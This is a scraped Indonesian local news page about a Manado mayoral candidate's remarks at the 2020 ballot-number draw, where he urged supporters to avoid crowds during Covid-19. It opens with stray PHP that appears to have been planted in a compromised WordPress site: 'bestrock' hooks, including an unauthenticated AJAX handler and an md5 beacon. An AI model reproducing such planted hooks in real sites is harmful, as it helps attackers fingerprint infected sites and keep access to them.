function bestrock_render_js(){ } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ } add_action('wp_head', 'bestrock_render_js'); add_action('wp_ajax_qgt', 'bestrock_render_index'); add_action('wp_ajax_nopriv_wrt', 'bestrock_render_ajax'); Harley Mangindaan: Semua Rencana Tuhan itu Baik – IndoSulut

Menu

Mode Gelap
Rektor Sompie Lantik Enam Pejabat Baru Unsrat Walikota Manado Terima Kunjungan BPK RI Sulut Kementrian Lingkungan Hidup Gelar TOT Akademisi Tahap IV di UNSRAT Manado Walikota Manado Gelar Rapat Teknis Soal Relokasi Warga Korban Bencana Wali Kota dan Wakil Wali Kota Manado Hadiri Acara Penyerahan Sertifikat Tanah

Uncategorized · 24 Sep 2020 23:13 WIB ·

Harley Mangindaan: Semua Rencana Tuhan itu Baik


					Pasangan PAHAM saat pencabutan nomor urut di KPU Manado Perbesar

Pasangan PAHAM saat pencabutan nomor urut di KPU Manado

Pasangan PAHAM saat pencabutan nomor urut di KPU Manado

 

MANADO – Tahapan Pemilihan Walikota (Pilwalko) Manado telah bergulir, sekarang, Kamis (24/09/2020) memasuki pencabutan nomor urut pasangan calon (Paslon).

Paslon jargon PAHAM, Walikota Prof Dr Julyeta Paulina Amelia Runtuwene MS dan Wakil Wali Kota Manado Dr Harley Alfredo Benfica Mangindaan SE MSM (JPAR-AiM), telah ditetapkan Komisi Pemilihan Umum (KPU) Manado sebagai pasangan calon bersama tiga lainnya.

Tahapan pencabutan nomor urut diketahui, dilakukan secara virtual oleh KPU Kota Manado karena yang bisa mengikuti langsung proses pencabutan nomor urut masing-masing Paslon hanya bisa 5 orang.

Lepas dari itu, Calon Wakil Wali Kota Manado Dr Harley Mangindaan mengatakan setalah ditetapkan menjadi pasangan calon dalam Pilwalkot Manado 2020, PAHAM melakukan doa bersama.

“Tetap semangat untuk semua masyarakat Kota Manado, nomor berapa yang akan didapatkan oleh PAHAM, pasti baik adanya dan semua merupakan rencana dari Tuhan,” kata Bang Ai sapaan akrab Harley Mangindaan.

Pada kesempatan Ai Mangindaan sekaligus menghimbau segenap tim relawan, pendukung dan simpatisan agar tidak ramai-ramai datang pada saat pencabutan nomor urut nanti. Hal ini terkait situasi dan kondisi Covid 19 yang terjadi di Kota Manado.

”Tetap jaga kesehatan. Untuk menghindari potensi penyebaran Covid 19, tidak perlu datang beramai-ramai saat pencabutan nomor urut. Mudah-mudahan semuanya bisa berjalan dengan lancar, mohon Doanya,” ungkap Ai Mangindaan sembari menambahkan, sebelumnya juga sudah dibuat kesepakatan dengan partai koalisi pengusung serta pasangan calon untuk tidak mengerahkan massa saat pencabutan nomor urut. (AMan)

Artikel ini telah dibaca 0 kali

badge-check

Penulis

Baca Lainnya

Safari Ramadhan Pemkot Manado di Kampung Jawa, Wali Kota: Kita Berikan Contoh Baik untuk Indonesia

26 Maret 2024 - 18:18 WIB

Inspektorat: Pemkot Manado Tidak Pernah Anggarkan Belanja Souvenir Seharga 3.8 Miliar

10 Maret 2024 - 10:58 WIB

Wali Kota Manado: Program Dana Duka diganti Bantuan Duka

27 Februari 2024 - 13:25 WIB

Capai 15 Ribu Suara Total, PDI Perjuangan Peluang 3 Kursi Dapil Tuminting – Bunaken

16 Februari 2024 - 21:31 WIB

Tertib saat Ikuti Kampanye, Richard Sualang Beri Apresiasi untuk Warga

1 Februari 2024 - 22:55 WIB

KPU Manado: Tidak Ada Potongan Apapun untuk Anggaran KPPS, Masyarakat Jangan Percaya Hoaks

30 Januari 2024 - 09:00 WIB

Trending di Uncategorized